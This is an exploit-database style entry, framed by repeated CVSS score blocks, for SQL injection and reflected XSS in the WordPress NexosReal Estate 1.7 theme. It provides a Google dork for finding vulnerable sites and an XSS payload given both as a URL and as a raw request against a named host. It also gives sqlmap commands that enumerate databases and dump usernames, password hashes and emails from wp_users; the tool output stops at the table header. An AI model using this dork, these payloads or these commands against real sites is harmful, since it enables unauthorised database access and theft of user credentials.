CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
92.4%
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
# Google Dork: inurl:/wp-content/themes/nexos/
# Date: 2020-06-17
# Exploit Author: Vlad Vector
# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
# Software Version: 1.7
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
# Tested on: Debian 10
# CVE: CVE-2020-15363, CVE-2020-15364
# CWE: CWE-79, CWE-89
### [ Info: ]
[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
### [ Vulnerabilities: ]
[x] Unauthenticated Reflected XSS
[x] SQL Injection
### [ PoC Unauthenticated Reflected XSS: ]
[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΞDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>
[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
Host: listing-themes.com
### [ PoC SQL Injection: ]
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: TARGET-DB
Table: wp_users
[9 entries]
+--------------+------------------------------------+-------------------------+
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
92.4%